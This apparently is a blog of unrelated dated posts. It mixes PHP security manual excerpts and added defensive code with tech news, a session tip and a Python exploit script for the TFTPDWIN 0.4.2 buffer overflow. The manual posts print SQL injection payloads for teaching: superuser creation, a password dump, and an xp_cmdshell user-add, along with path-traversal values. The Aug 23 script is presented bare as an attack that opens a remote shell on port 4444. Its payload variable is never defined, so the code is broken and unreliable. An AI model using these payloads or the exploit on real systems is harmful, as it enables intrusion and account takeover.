Aug 31

Using Register Globals

Perhaps the most controversial change in PHP is when the default value for the PHP directive register_globals went from ON to OFF in PHP 4.2.0. Reliance on this directive was quite common, and many people didn’t even know it existed and assumed it was just how PHP works. This page will explain how one can write insecure code with this directive, but keep in mind that the directive itself isn’t insecure; rather, it is the misuse of it that is.

When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier. It was a difficult decision, but the PHP community decided to disable this directive by default. When on, people use variables yet really don’t know for sure where they come from and can only assume. Internal variables that are defined in the script itself get mixed up with request data sent by users and disabling register_globals changes this. Let’s demonstrate with an example misuse of register_globals:

Example 1 Example misuse with register_globals = on

<?php
// define $authorized = true only if user is authenticated
if (authenticated_user()) {
    $authorized = true;
}
// Because we didn't first initialize $authorized as false, this might be
// defined through register_globals, like from GET auth.php?authorized=1
// So, anyone can be seen as authenticated!
if ($authorized) {
    include "/highly/sensitive/data.php";
}
?>

When register_globals = on, our logic above may be compromised. When off, $authorized can’t be set via request so it’ll be fine, although it really is generally a good programming practice to initialize variables first. For example, in our example above we might have first done $authorized = false. Doing this first means our above code would work with register_globals on or off as users by default would be unauthorized.

Another example is that of sessions. When register_globals = on, we could also use $username in our example below but again you must realize that $username could also come from other means, such as GET (through the URL).

Example 2 Example use of sessions with register_globals on or off

<?php
// We wouldn't know where $username came from but do know $_SESSION is
// for session data
if (isset($_SESSION['username'])) {
    echo "Hello <b>{$_SESSION['username']}</b>";
} else {
    echo "Hello <b>Guest</b><br />";
    echo "Would you like to login?";
}
?>

It’s even possible to take preventative measures to warn when forging is being attempted. If you know ahead of time exactly where a variable should be coming from, you can check to see if the submitted data is coming from an inappropriate kind of submission. While it doesn’t guarantee that data has not been forged, it does require an attacker to guess the right kind of forging. If you don’t care where the request data comes from, you can use $_REQUEST as it contains a mix of GET, POST and COOKIE data. See also the manual section on using variables from external sources.

Example 3 Detecting simple variable poisoning

<?php
if (isset($_COOKIE['MAGIC_COOKIE'])) {
    // MAGIC_COOKIE comes from a cookie.
    // Be sure to validate the cookie data!
} elseif (isset($_GET['MAGIC_COOKIE']) || isset($_POST['MAGIC_COOKIE'])) {
    mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']);
    echo "Security violation, admin has been alerted.";
    exit;
} else {
    // MAGIC_COOKIE isn't set through this REQUEST
}
?>

Of course, simply turning off register_globals does not mean your code is secure. For every piece of data that is submitted, it should also be checked in other ways. Always validate your user data and initialize your variables! To check for uninitialized variables you may turn up error_reporting() to show E_NOTICE level errors.

For information about emulating register_globals being On or Off

Aug 30

Apple’s iPhone may be the darling of the mobile-phone industry right now, but some users in France aren’t singing its praises, claiming that the device explodes or cracks without warning.

However, after conducting an internal investigation into the cause of the broken touch-screen glass, Apple denies that there is an underlying iPhone flaw. In fact, Apple said that in all cases it investigated, some kind of force was applied to the iPhone, causing the glass to break, according to a BBC report Friday.

"The iPhones with broken glass that we have analyzed to date show that in all cases, the glass cracked due to an external force that was applied to the iPhone," Apple said in a statement cited by the BBC.

Last Tuesday, in response to a European Commission investigation into accusations of overheating and exploding iPhones, Apple referred to its internal investigation, saying, "We are waiting to receive the iPhones from the customers."

As part of its investigation, Apple also looked into complaints of the iPhone battery overheating but again said it found no problems. "To date, there are no confirmed battery-overheating incidents for iPhone 3GS, and the number of reports we are investigating is in the single digits," according to the statement.

The investigation’s findings don’t mean much to France’s Frank Benoiton, a consumer who said his wife’s iPhone cracked, and it "was not dropped and experienced no unusual shock," he told the Associated Press.

France’s trade minister declined to comment on a meeting with Apple about an investigation that the country’s consumer protection agency is conducting into the reports, according to Bloomberg.

The European Commission also issued a warning using its rapid-alert system, Rapex, which warns of dangerous consumer products.

Aug 29

Welcome to the day after Microsoft lowered the price on its $300 Xbox 360 Elite, wrinkling its brow and lowering its horns to meet Sony’s slimmer, $100 cheaper PlayStation 3 in battle. While the incidentals differ between the two, we’ve officially entered the melee phase of the campaign. The riders are off their horses, lances in the mud, swords drawn, endorsement-and-feature-laden tabards flapping. Welcome to the first day of the headiest holiday game sales season in years.

Microsoft’s director of product management for Xbox Live Aaron Greenberg is doing his best to dismiss assumptions that the Xbox 360's price drop was reactionary. He’s popped up in several locations in the last 24 hours claiming the timing of the 360's price drop was simply "coincidental."

I don’t doubt him. It’s that time of year, and getting out in front of the holiday action is essential. In a few weeks, the kids are back in school. Before you know it, the leaves will be turning and we’ll be talking Halo 3: ODST, Gran Turismo PSP, Sony’s PSP Go, Uncharted 2, Dragon Age: Origins, and Modern Warfare 2.

But don’t think for a minute Microsoft and Sony aren’t eyeing each other like tomb raiders squaring off over the Holy Grail. The analysts haven’t weighed in yet, but I’m betting they’ll mark this holiday season as pivotal. Will Sony bite back into Microsoft’s lead? Will Microsoft pull away permanently? Will Nintendo maintain its pole position? Or are its halcyon days finally over? Stand back, because the meaningless rhetoric (but correspondingly meaningful sales deals) could be explosive.

That’s good news, because it means we’re finally well enough along that these systems are becoming affordable. Sony’s PlayStation 3 started off at nigh 3DO price levels, something I think we can all agree at this point was a terrible starter move. And Microsoft…let’s just say I’m amazed that peripherals like a $100 802.11g adapter and $150 120GB hard drive upgrade haven’t incited a Thermidorian Reaction. However cynical it sounds, you do have to admire the latter for getting its "modular" medicine down our throats with spoonfuls of marketing sugar.

Where to next? After I trot out an updated price guide, it’s back to games and services. The PlayStation 3 may be slimmer, and at $300, the Xbox 360 Elite may be "eliter," but in the end, we play games, not boxes.

Aug 28

Error Reporting

With PHP security, there are two sides to error reporting. One is beneficial to increasing security, the other is detrimental.

A standard attack tactic involves profiling a system by feeding it improper data, and checking for the kinds, and contexts, of the errors which are returned. This allows the system cracker to probe for information about the server, to determine possible weaknesses. For example, if an attacker had gleaned information about a page based on a prior form submission, they may attempt to override variables, or modify them:

Example 1 Attacking Variables with a custom HTML page

<form method="post" action="attacktarget?username=badfoo&amp;password=badfoo">
    <input type="hidden" name="username" value="badfoo" />
    <input type="hidden" name="password" value="badfoo" />
</form>

The PHP errors which are normally returned can be quite helpful to a developer who is trying to debug a script, indicating such things as the function or file that failed, the PHP file it failed in, and the line number which the failure occurred in. This is all information that can be exploited. It is not uncommon for a php developer to use show_source(), highlight_string(), or highlight_file() as a debugging measure, but in a live site, this can expose hidden variables, unchecked syntax, and other dangerous information. Especially dangerous is running code from known sources with built-in debugging handlers, or using common debugging techniques. If the attacker can determine what general technique you are using, they may try to brute-force a page, by sending various common debugging strings:

Example 2 Exploiting common debugging variables

<form method="post" action="attacktarget?errors=Y&amp;showerrors=1&amp;debug=1">
    <input type="hidden" name="errors" value="Y" />
    <input type="hidden" name="showerrors" value="1" />
    <input type="hidden" name="debug" value="1" />
</form>

Regardless of the method of error handling, the ability to probe a system for errors leads to providing an attacker with more information.

For example, the very style of a generic PHP error indicates a system is running PHP. If the attacker was looking at an .html page, and wanted to probe for the back-end (to look for known weaknesses in the system), by feeding it the wrong data they may be able to determine that a system was built with PHP.

A function error can indicate whether a system may be running a specific database engine, or give clues as to how a web page was programmed or designed. This allows for deeper investigation into open database ports, or to look for specific bugs or weaknesses in a web page. By feeding different pieces of bad data, for example, an attacker can determine the order of authentication in a script (from the line number errors), as well as probe for weaknesses that may be exploited in different locations in the script.

A filesystem or general PHP error can indicate what permissions the web server has, as well as the structure and organization of files on the web server. Developer-written error code can aggravate this problem, leading to easy exploitation of formerly "hidden" information.

There are three major solutions to this issue. The first is to scrutinize all functions, and attempt to compensate for the bulk of the errors. The second is to disable error reporting entirely on the running code. The third is to use PHP’s custom error handling functions to create your own error handler. Depending on your security policy, you may find all three to be applicable to your situation.

One way of catching this issue ahead of time is to make use of PHP’s own error_reporting(), to help you secure your code and find variable usage that may be dangerous. By testing your code, prior to deployment, with E_ALL, you can quickly find areas where your variables may be open to poisoning or modification in other ways. Once you are ready for deployment, you should either disable error reporting completely by setting error_reporting() to 0, or turn off the error display using the php.ini option display_errors, to insulate your code from probing. If you choose to do the latter, you should also define the path to your log file using the error_log ini directive, and turn log_errors on.

Example 3 Finding dangerous variables with E_ALL

<?php
if ($username) {  // Not initialized or checked before usage
    $good_login = 1;
}
if ($good_login == 1) { // If above test fails, not initialized or checked before usage
    readfile("/highly/sensitive/data/index.html");
}
?>
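As an added example (not from the PHP manual), a small bootstrap that combines the two deployment recommendations above (report E_ALL to the log, never to the browser) with the third solution, a custom error handler that keeps file names and line numbers out of the response. It assumes PHP 7 or later and a log path of /var/log/php/app.log that the web server user can write to.

```php
<?php
// Added example, not from the PHP manual. Assumes PHP 7+ and that
// /var/log/php/app.log is writable by the web server user.

// Report everything: uninitialized variables surface as E_NOTICE/E_WARNING in the log.
error_reporting(E_ALL);
// Never render errors into the HTTP response; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');

/**
 * Custom handler: full detail (file, line, client address) goes to the log;
 * the client only ever sees a generic message.
 */
function secure_error_handler(int $errno, string $errstr, string $errfile, int $errline): bool
{
    // Honour the @ operator and the error_reporting() mask.
    if (!(error_reporting() & $errno)) {
        return false;
    }
    error_log(sprintf('[%d] %s in %s:%d (remote %s)',
        $errno, $errstr, $errfile, $errline, $_SERVER['REMOTE_ADDR'] ?? 'cli'));

    if ($errno & (E_USER_ERROR | E_RECOVERABLE_ERROR)) {
        http_response_code(500);
        echo 'An internal error occurred.';   // no paths, line numbers or SQL
        exit(1);
    }
    return true;   // handled: PHP's built-in handler (and its display) is not invoked
}
set_error_handler('secure_error_handler');

// Uncaught exceptions would otherwise end the script with a bare fatal error
// (and a stack trace, should display_errors ever be switched back on).
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('Uncaught %s: %s in %s:%d',
        get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});
```

Running the same bootstrap with display_errors set to 1 in a development environment gives the E_ALL view recommended above for finding uninitialized variables before deployment.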

Aug 27

SQL Injection

Many web developers are unaware of how SQL queries can be tampered with, and assume that an SQL query is a trusted command. This means that SQL queries are able to circumvent access controls, thereby bypassing standard authentication and authorization checks, and sometimes SQL queries may even allow access to host operating system level commands.

Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build a SQL query. The following examples are based on true stories, unfortunately.

Owing to the lack of input validation and connecting to the database on behalf of a superuser or the one who can create users, the attacker may create a superuser in your database.

Example 1:

<?php
$offset = $_GET['offset']; // beware, no input validation!
$query  = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);
?>

Normal users click on the ‘next’ and ‘prev’ links, where $offset is encoded into the URL. The script expects that the incoming $offset is a decimal number. However, what if someone tries to break in by appending a urlencode()’d form of the following to the URL:

0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; --

If this happened, the script would hand superuser access to the attacker. Note that 0; is there to supply a valid offset to the original query and to terminate it.

Note: It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with --, which is the comment sign in SQL.

A feasible way to gain passwords is to circumvent your search result pages. The only thing the attacker needs to do is to see if there are any submitted variables used in SQL statements which are not handled properly. These filters can be set commonly in a preceding form to customize WHERE, ORDER BY, LIMIT and OFFSET clauses in SELECT statements. If your database supports the UNION construct, the attacker may try to append an entire query to the original one to list passwords from an arbitrary table. Using encrypted password fields is strongly encouraged.

Example 2:

<?php
$query  = "SELECT id, name, inserted, size FROM products
                  WHERE size = '$size'
                  ORDER BY $order LIMIT $limit, $offset;";
$result = odbc_exec($conn, $query);
?>

The static part of the query can be combined with another SELECT statement which reveals all passwords:

' union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable; --

If this query (playing with the quotes and --) were assigned to one of the variables used in $query, the query beast is awakened.

SQL UPDATEs are also susceptible to attack. These queries are also threatened by chopping and appending an entirely new query to them. But the attacker might instead fiddle with the SET clause. In this case some schema information must be possessed to manipulate the query successfully. This can be acquired by examining the form variable names, or simply by brute forcing. There are not so many naming conventions for fields storing passwords or usernames.

Example 3:

<?php
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
?>

But a malicious user submits the value ' or uid like '%admin%'; -- to $uid to change the admin’s password, or simply sets $pwd to "hehehe', admin='yes', trusted=100 " (with a trailing space) to gain more privileges. Then, the query will be twisted:

<?php
// $uid == ' or uid like'%admin%'; --
$query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%'; --";
// $pwd == "hehehe', admin='yes', trusted=100 "
$query = "UPDATE usertable SET pwd='hehehe', admin='yes', trusted=100 WHERE
...;";
?>

A frightening example of how operating system level commands can be accessed on some database hosts.

Example 4:

<?php
$query  = "SELECT * FROM products WHERE id LIKE '%$prod%'";
$result = mssql_query($query);
?>

If an attacker submits the value a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- to $prod, then $query will be:

<?php
$query  = "SELECT * FROM products
                    WHERE id LIKE '%a%'
                    exec master..xp_cmdshell 'net user test testpass /ADD'--";
$result = mssql_query($query);
?>

MSSQL Server executes the SQL statements in the batch including a command to add a new user to the local accounts database. If this application were running as sa and the MSSQLSERVER service is running with sufficient privileges, the attacker would now have an account with which to access this machine.

Note: Some of the examples above are tied to a specific database server. This does not mean that a similar attack is impossible against other products. Your database server may be similarly vulnerable in another manner.

Avoiding techniques

You may plead that the attacker must possess a piece of information about the database schema in most examples. You are right, but you never know when and how it can be taken out, and if it happens, your database may be exposed. If you are using an open source, or publicly available database handling package, which may belong to a content management system or forum, the intruders can easily produce a copy of a piece of your code. It may also be a security risk if it is a poorly designed one.

These attacks are mainly based on exploiting the code not being written with security in mind. Never trust any kind of input, especially that which comes from the client side, even though it comes from a select box, a hidden input field or a cookie. The first example shows that such a blameless query can cause disasters.

  • Never connect to the database as a superuser or as the database owner. Always use customized users with very limited privileges.
  • Check if the given input has the expected data type. PHP has a wide range of input validating functions, from the simplest ones found in Variable Functions and in Character Type Functions (e.g. is_numeric(), ctype_digit() respectively) and onwards to the Perl compatible Regular Expressions support.
  • If the application waits for numerical input, consider verifying data with is_numeric(), or silently change its type using settype(), or use its numeric representation by sprintf().

Example 5:

<?php
settype($offset, 'integer');
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
// please note %d in the format string, using %s would be meaningless
$query = sprintf("SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;",
                 $offset);
?>

Besides these, you benefit from logging queries either within your script or by the database itself, if it supports logging. Obviously, the logging is unable to prevent any harmful attempt, but it can be helpful to trace back which application has been circumvented. The log is not useful by itself, but through the information it contains. More detail is generally better than less.
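As an added example (not from the PHP manual), the query from Example 2 rewritten with PDO prepared statements, assuming a PDO connection $pdo to a database holding the products table: the values are bound rather than concatenated, the ORDER BY column (which cannot be a bound parameter) is mapped through a fixed list, and LIMIT/OFFSET are checked with ctype_digit() before being bound as integers.

```php
<?php
// Added example, not from the PHP manual. Assumes $pdo is a PDO connection to a
// database with the manual's products(id, name, inserted, size) table.

function find_products(PDO $pdo, array $input): array
{
    // Ask for real server-side prepared statements; with emulation the driver
    // quotes values client-side instead, which we would rather not rely on.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

    // WHERE value: bound, so "' union select ..." is compared as a literal string.
    $size = is_string($input['size'] ?? null) ? $input['size'] : '';

    // ORDER BY names a column, which cannot be a bound parameter: map the request
    // onto a fixed list of identifiers and fall back to a default for anything else.
    $allowedOrder = ['name' => 'name', 'inserted' => 'inserted', 'size' => 'size'];
    $order = 'name';
    if (is_string($input['order'] ?? null) && isset($allowedOrder[$input['order']])) {
        $order = $allowedOrder[$input['order']];
    }

    // LIMIT/OFFSET: digits only (ctype_digit, as above), capped, then bound as integers.
    $limit  = 20;
    $offset = 0;
    if (is_string($input['limit'] ?? null) && ctype_digit($input['limit'])) {
        $limit = min((int) $input['limit'], 100);
    }
    if (is_string($input['offset'] ?? null) && ctype_digit($input['offset'])) {
        $offset = (int) $input['offset'];
    }

    // $order is interpolated, but it can only ever be one of the allow-listed names.
    $stmt = $pdo->prepare(
        "SELECT id, name, inserted, size FROM products
          WHERE size = :size
          ORDER BY $order
          LIMIT :limit OFFSET :offset"
    );
    $stmt->bindValue(':size',   $size,   PDO::PARAM_STR);
    $stmt->bindValue(':limit',  $limit,  PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with request data; every key is treated as untrusted inside the function.
// $rows = find_products($pdo, $_GET);
```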

Aug 26

Filesystem Security

PHP is subject to the security built into most server systems with respect to permissions on a file and directory basis. This allows you to control which files in the filesystem may be read. Care should be taken with any files which are world readable to ensure that they are safe for reading by all users who have access to that filesystem.

Since PHP was designed to allow user level access to the filesystem, it’s entirely possible to write a PHP script that will allow you to read system files such as /etc/passwd, modify your ethernet connections, send massive printer jobs out, etc. This has some obvious implications, in that you need to ensure that the files that you read from and write to are the appropriate ones.

Consider the following script, where a user indicates that they’d like to delete a file in their home directory. This assumes a situation where a PHP web interface is regularly used for file management, so the Apache user is allowed to delete files in the user home directories.

Example 1:

<?php
// remove a file from the user's home directory
$username = $_POST['user_submitted_name'];
$userfile = $_POST['user_submitted_filename'];
$homedir  = "/home/$username";
unlink("$homedir/$userfile");
echo "The file has been deleted!";
?>

Since the username and the filename are postable from a user form, they can submit a username and a filename belonging to someone else, and delete it even if they’re not supposed to be allowed to do so. In this case, you’d want to use some other form of authentication. Consider what could happen if the variables submitted were "../etc/" and "passwd". The code would then effectively read:

Example 2:

<?php
// removes a file from anywhere on the hard drive that
// the PHP user has access to. If PHP has root access:
$username = $_POST['user_submitted_name']; // "../etc"
$userfile = $_POST['user_submitted_filename']; // "passwd"
$homedir  = "/home/$username"; // "/home/../etc"
unlink("$homedir/$userfile"); // "/home/../etc/passwd"
echo "The file has been deleted!";
?>

There are two important measures you should take to prevent these issues.

  • Only allow limited permissions to the PHP web user binary.
  • Check all variables which are submitted.

Here is an improved script:

Example 3:

<?php
// removes a file from the hard drive that
// the PHP user has access to.
$username = $_SERVER['REMOTE_USER']; // using an authentication mechanism
$userfile = basename($_POST['user_submitted_filename']);
$homedir  = "/home/$username";
$filepath = "$homedir/$userfile";
if (file_exists($filepath) && unlink($filepath)) {
    $logstring = "Deleted $filepath\n";
} else {
    $logstring = "Failed to delete $filepath\n";
}
$fp = fopen("/home/logging/filedelete.log", "a");
fwrite($fp, $logstring);
fclose($fp);
echo htmlentities($logstring, ENT_QUOTES);
?>

However, even this is not without its flaws. If your authentication system allowed users to create their own user logins, and a user chose the login "../etc/", the system is once again exposed. For this reason, you may prefer to write a more customized check:

Example 4:

<?php
$username     = $_SERVER['REMOTE_USER']; // using an authentication mechanism
$userfile     = $_POST['user_submitted_filename'];
$homedir      = "/home/$username";
$filepath     = "$homedir/$userfile";
if (!ctype_alnum($username) || !preg_match('/^(?:[a-z0-9_-]|\.(?!\.))+$/iD', $userfile)) {
    die("Bad username/filename");
}
//etc...
?>

Depending on your operating system, there are a wide variety of files which you should be concerned about, including device entries (/dev/ or COM1), configuration files (/etc/ files and the .ini files), well known file storage areas (/home/, My Documents), etc. For this reason, it’s usually easier to create a policy where you forbid everything except for what you explicitly allow.
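As an added example (not from the PHP manual), a deletion routine that resolves the requested path with realpath() and refuses anything that does not stay inside the authenticated user's home directory, assuming the /home/<user> layout of the examples above and a username supplied by the web server's authentication rather than by the form.

```php
<?php
// Added example, not from the PHP manual. Assumes users' files live under
// /home/<username> and that $username comes from the server's authentication.

function delete_user_file(string $username, string $userfile): bool
{
    // A username that is not a plain identifier ("../etc") is rejected outright.
    if (!preg_match('/^[a-z][a-z0-9_-]{0,31}$/D', $username)) {
        throw new InvalidArgumentException('Bad username');
    }
    // Reject empty names, NUL bytes and absolute paths; realpath() handles the rest.
    if ($userfile === '' || strpos($userfile, "\0") !== false || $userfile[0] === '/') {
        throw new InvalidArgumentException('Bad filename');
    }

    $homedir = realpath("/home/$username");
    if ($homedir === false) {
        return false;                     // no such home directory
    }
    // realpath() collapses ".." and follows symlinks, so a name that merely looks
    // like it is under $homedir but points elsewhere resolves to its real location.
    $target = realpath("$homedir/$userfile");
    if ($target === false) {
        return false;                     // does not exist
    }
    // Containment check. The trailing separator matters: without it,
    // /home/alice-backup would pass for user alice.
    if (strpos($target, $homedir . DIRECTORY_SEPARATOR) !== 0) {
        error_log(sprintf('Path traversal attempt by %s: %s (remote %s)',
            $username, $userfile, $_SERVER['REMOTE_ADDR'] ?? 'cli'));
        return false;
    }
    if (!is_file($target)) {
        return false;                     // never unlink directories or device nodes
    }
    return unlink($target);
}

// Usage: the username is taken from authentication, never from the form.
// delete_user_file($_SERVER['REMOTE_USER'], $_POST['user_submitted_filename'] ?? '');
```

realpath() inspects the path at one instant, and the unlink() is a second step, so on a host where other users can create symlinks under a home directory the web server user's own limited filesystem permissions (the first measure above) remain the backstop.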

Aug 25

my session test code:

<html>
<head>
<title>PHP SESSION TEST CODE</title>
</head>
<body>
<?
session_start();
session_register("MVAR");
$MVAR="hello world";
echo "The content of sess variable is $MVAR";
?>
<a href="call_session.php">Next page</a>
</body>
</html>

Error Tips

Warning: session_start(): Cannot send session cookie - headers already sent by (output started at d:\www\session.php:7) in d:\www\session.php on line 8

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at d:\www\session.php:7) in d:\www\session.php on line 8

The content of sess variable is hello worldNext page

Solution:

1. Modify your php.ini file. Find the output_buffering variable and set its value to on, as output_buffering = On.

2. Find your session save path; you can find it in php.ini as session.save_path = "c:\tmp". Please ensure PHP can write to the "c:\tmp" directory.

Aug 24

While confirming that the Zune HD now sports an Apps menu, Microsoft is being circumspect on just how extensive the collection of programs it plans to offer for the media player will be.

An eagle-eyed user this weekend spotted an Apps menu on some of the devices being demonstrated at Best Buy outlets as part of a preview weekend. Microsoft suggested on Monday that the Apps menu and Zune Marketplace will be home to the types of games found on past Zunes but hedged on whether and when it might offer a broader selection of software.

Microsoft confirms its Zune HD will have an Apps menu, but is being far less clear on just what kinds of Apps it will have.

"Games came pre-loaded on the current version of the device, but we made a decision to take them out of the firmware update and let people choose what games they want to have for themselves–and it made sense to do this via Marketplace," a representative told CNET News. "As before, games are free; the only difference is that people get to choose. Right now, we don’t have anything further to say regarding Apps functionality beyond what we’ve already shared."

Early versions of the device seen by CNET News had a games menu, but the games were similar to the kinds of free games included in the past.

Microsoft suggested that the Apps menu, for the moment, might just be an outlet for such games. However, the company is clearly leaving the door open for much more.

"We have games on the Zune today and those will carry forward to Zune HD, but that’s not where we’ll necessarily stop," Microsoft said.

The Zune HD is slated to go on sale September 15, though Best Buy and Microsoft are also taking pre-orders for the product. A 16GB version will sell for $219, while a 32GB version is priced at $289.

Aug 23

#!/usr/bin/python

#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith

import os
import sys
import struct
import socket
import time

print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
    print "Usage: tftpdwin.py <ip>"
    sys.exit(0)

target = sys.argv[1]
def Connect(target):
    connect = "telnet " + target + " 4444"
    os.system(connect)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
    s.sendto(buffer, (target,69))
    print "[*] Initiating Buffer Overflow"
    time.sleep(2)
    print "[*] Attempting Connection to Remote Host"
    time.sleep(2)
    print "[*] Please Wait...\n"
    time.sleep(3)
    Connect(target)
    print "\nClosing Remote Connection\n"
    sys.exit(0)
except:
    print "Goodbye\n"
